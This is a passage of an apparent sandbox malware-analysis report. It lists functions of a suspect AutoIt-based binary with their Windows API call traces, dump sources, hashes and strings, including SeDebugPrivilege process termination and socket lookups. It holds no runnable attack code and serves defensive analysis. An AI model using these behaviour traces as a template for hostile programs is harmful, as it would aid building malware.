                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 005BABC7
                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 005BABD2
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005BAC23
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                      • Opcode ID: 71da8a7f4f67976a99b8a367aa9af056579477ba10fe3fe4b069753e1766f08e
                                                                                                                                                      • Instruction ID: 6409151897701bd0a7993a153607765dcb91bfad086f04a55cffc8b30428d5e3
                                                                                                                                                      • Opcode Fuzzy Hash: 71da8a7f4f67976a99b8a367aa9af056579477ba10fe3fe4b069753e1766f08e
                                                                                                                                                      • Instruction Fuzzy Hash: 17618D70208642AFD720DF18C499F56BFE1BF54318F18849CE4668B7A2C775ED4ACB92
                                                                                                                                                      Function 005C41E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005C4284
                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005C4299
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005C42B3
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C42F8
                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 005C4325
                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005C4353
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                      • API String ID: 2147712094-78025650
                                                                                                                                                      • Opcode ID: 86df862ae75671ad4ba6571139e72a2f44d5087317b72c9e33fd081985535834
                                                                                                                                                      • Instruction ID: 270fc11425803ada784010cb0e21c181a819651e3eacff8e748c7aec897ca116
                                                                                                                                                      • Opcode Fuzzy Hash: 86df862ae75671ad4ba6571139e72a2f44d5087317b72c9e33fd081985535834
                                                                                                                                                      • Instruction Fuzzy Hash: 1641AC35A00209AFDB219FA4CC49FEA7BB9FF48360F10052AF954E7291D7749984CFA0
                                                                                                                                                      Function 005C8B3A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0058FB8F,00000000,?,?,00000000,?,005739BC,00000004,00000000,00000000), ref: 005C8BAB
                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 005C8BD1
                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 005C8C30
                                                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 005C8C44
                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 005C8C6A
                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005C8C8E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 642888154-1270690246
                                                                                                                                                      • Opcode ID: f97ccaa02ba6b2682c0c6166a2c42774172d0b951f5a101ac5d93ff57f246956
                                                                                                                                                      • Instruction ID: 00a0412a93908aad2bb961dd09126cbbafc1b52140a05fdfec1e18eb15befc2d
                                                                                                                                                      • Opcode Fuzzy Hash: f97ccaa02ba6b2682c0c6166a2c42774172d0b951f5a101ac5d93ff57f246956
                                                                                                                                                      • Instruction Fuzzy Hash: C2414E74601645AFDB15CF64C899FB57FF1FB49308F1851A9E6088B2A2CB35AC45CB50
                                                                                                                                                      Function 0059E653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                      • API String ID: 642191829-3771769585
                                                                                                                                                      • Opcode ID: b2995595d0631d659c202b8c9fab20cc599eef6b07b8dc2618994a2f94291c30
                                                                                                                                                      • Instruction ID: 3322fe342631b2828fe1cace19ed2d0666c4fe682a08d06004ab526617ef4214
                                                                                                                                                      • Opcode Fuzzy Hash: b2995595d0631d659c202b8c9fab20cc599eef6b07b8dc2618994a2f94291c30
                                                                                                                                                      • Instruction Fuzzy Hash: AB11D2319002166FDB24AB60DC4FEDA7FBCFF94711F10006AF945D2091EB748A85AA61
                                                                                                                                                      Function 005B42A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005B42C8
                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 005B43D7
                                                                                                                                                      • _wcslen.LIBCMT ref: 005B43E7
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005B457C
                                                                                                                                                        • Part of subcall function 005A15B3: VariantInit.OLEAUT32(00000000), ref: 005A15F3
                                                                                                                                                        • Part of subcall function 005A15B3: VariantCopy.OLEAUT32(?,?), ref: 005A15FC
                                                                                                                                                        • Part of subcall function 005A15B3: VariantClear.OLEAUT32(?), ref: 005A1608
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                                                                      • Opcode ID: c7707bc337e2d3d4167f2458131f841c0207e527da2af68ac97c77005e931e49
                                                                                                                                                      • Instruction ID: d1903b2f36a31766bd868542cd4622687b07bf727daf158b78fe44cf45016862
                                                                                                                                                      • Opcode Fuzzy Hash: c7707bc337e2d3d4167f2458131f841c0207e527da2af68ac97c77005e931e49
                                                                                                                                                      • Instruction Fuzzy Hash: 679147746087029FCB14DF28C48596ABBE5BF88314F14882DF88A9B352DB31ED46CF52
                                                                                                                                                      Function 005C2A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenu.USER32(?), ref: 005C2AE2
                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 005C2B14
                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005C2B3C
                                                                                                                                                      • _wcslen.LIBCMT ref: 005C2B72
                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 005C2BAC
                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 005C2BBA
                                                                                                                                                        • Part of subcall function 005942CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005942E6
                                                                                                                                                        • Part of subcall function 005942CC: GetCurrentThreadId.KERNEL32 ref: 005942ED
                                                                                                                                                        • Part of subcall function 005942CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00592E43), ref: 005942F4
                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005C2C42
                                                                                                                                                        • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4196846111-0
                                                                                                                                                      • Opcode ID: 49989ae293cac3e15ea501c938e2878c7da6e234def88c3135b660551ae11fc0
                                                                                                                                                      • Instruction ID: 406eace05ada084a92292e1dea7753bed8279834b97ced5229e58da3bc7eaabe
                                                                                                                                                      • Opcode Fuzzy Hash: 49989ae293cac3e15ea501c938e2878c7da6e234def88c3135b660551ae11fc0
                                                                                                                                                      • Instruction Fuzzy Hash: 80715B75A00205AFCB14EFA4C885EAEBBB5FF88310F14846DE816EB251DB74ED41DB90
                                                                                                                                                      Function 005C46DB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C4794
                                                                                                                                                      • IsMenu.USER32(?), ref: 005C47A9
                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005C47F1
                                                                                                                                                      • DrawMenuBar.USER32 ref: 005C4804
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                      • String ID: 0$Hb
                                                                                                                                                      • API String ID: 3076010158-615381975
                                                                                                                                                      • Opcode ID: 40f275fdd11b515fa6a30151941adc5fb329220b519773a57615d7b4ee1d59d6
                                                                                                                                                      • Instruction ID: 9a4d18533daf69b5e3c302b97fee81d72fb98c1619aa63ffe191770f248d4881
                                                                                                                                                      • Opcode Fuzzy Hash: 40f275fdd11b515fa6a30151941adc5fb329220b519773a57615d7b4ee1d59d6
                                                                                                                                                      • Instruction Fuzzy Hash: B4411375A01249AFDB20CFA4D8A4EAABBB9FF49354F048129E905AB250C730ED55DF60
                                                                                                                                                      Function 0059808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005980D1
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005980F7
                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 005980FA
                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 0059811B
                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00598124
                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0059813E
                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0059814C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                      • Opcode ID: 82dbc40d0cf5bc7da28082c254248fad012f6836e9b94360dde16edfee063e83
                                                                                                                                                      • Instruction ID: d50e65241e0f3cb40dd8b662724b9feb08baeb0887dc2eff401b941b4324ddfc
                                                                                                                                                      • Opcode Fuzzy Hash: 82dbc40d0cf5bc7da28082c254248fad012f6836e9b94360dde16edfee063e83
                                                                                                                                                      • Instruction Fuzzy Hash: D8219871204204AFDF109FA8DC88CBA7BFCFB5A3607048525FA05CB2A0DA70EC4AD764
                                                                                                                                                      Function 005A0D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 005A0DAE
                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005A0DEA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                      • String ID: nul
                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                      • Opcode ID: b9442736cf23137b8945408431b506ba80788d915fb7532701f869dade67b20a
                                                                                                                                                      • Instruction ID: d965e6a81141806d78c3ddf63ed0c46a2f7e007026163f94a4b654c8056d38cb
                                                                                                                                                      • Opcode Fuzzy Hash: b9442736cf23137b8945408431b506ba80788d915fb7532701f869dade67b20a
                                                                                                                                                      • Instruction Fuzzy Hash: AC215C75510305AFDB209F69D804A9EBFB8BF56720F205E29E9A1D72E0D770AC50EB60
                                                                                                                                                      Function 005A0E63 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 005A0E82
                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005A0EBD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                      • String ID: nul
                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                      • Opcode ID: 16b57b1f9de1dc5def26c2f2556ebd741f4d6c67e3a302dca5e3084b6518164e
                                                                                                                                                      • Instruction ID: 782bef50ea81d3efbd2d08e95abf07f326a6cca099245821ec8712f1a74cd89a
                                                                                                                                                      • Opcode Fuzzy Hash: 16b57b1f9de1dc5def26c2f2556ebd741f4d6c67e3a302dca5e3084b6518164e
                                                                                                                                                      • Instruction Fuzzy Hash: 97218E75510306AFDB209F289C04A9EBBF8FF5A734F201A29F9A1E32D0D7719845DB60
                                                                                                                                                      Function 005C4A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00537759
                                                                                                                                                        • Part of subcall function 0053771B: GetStockObject.GDI32(00000011), ref: 0053776D
                                                                                                                                                        • Part of subcall function 0053771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00537777
                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005C4A71
                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005C4A7E
                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005C4A89
                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005C4A98
                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005C4AA4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                      • Opcode ID: 9474547aa30b8d19fa0bfe3dc19db39f3055889d02a7fdcc65658764ce6037bd
                                                                                                                                                      • Instruction ID: b09504c1c233ccfbf723e6fbcca34c9d719759df48aa0e2351b16851de29ec38
                                                                                                                                                      • Opcode Fuzzy Hash: 9474547aa30b8d19fa0bfe3dc19db39f3055889d02a7fdcc65658764ce6037bd
                                                                                                                                                      • Instruction Fuzzy Hash: E81151B515011EBEEF119EA4CC85EE77F9DFF08758F014111BA14A6050C6759C219BA4
                                                                                                                                                      Function 0059E223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0059E23D
                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0059E244
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0059E25A
                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0059E261
                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0059E2A5
                                                                                                                                                      Strings
                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0059E282
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                      • Opcode ID: 4ce8afeacefee0301e96b396f248c164859d967a35e48370e9aee5380d76a4fe
                                                                                                                                                      • Instruction ID: 3bea10d406eafa88cccc5a3e1b04cacd216639c0733bae0b5f86949933025ae6
                                                                                                                                                      • Opcode Fuzzy Hash: 4ce8afeacefee0301e96b396f248c164859d967a35e48370e9aee5380d76a4fe
                                                                                                                                                      • Instruction Fuzzy Hash: CB0112F69002087FEB11D7949D8AEE77B7CE708304F4045A5B745E2041E6749E88DB75
                                                                                                                                                      Function 005B25BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005B271D
                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005B273E
                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005B274F
                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 005B2838
                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 005B27E9
                                                                                                                                                        • Part of subcall function 00594277: _strlen.LIBCMT ref: 00594281
                                                                                                                                                        • Part of subcall function 005B3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,005AF569), ref: 005B3B9D
                                                                                                                                                      • _strlen.LIBCMT ref: 005B2892
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                      • String ID:
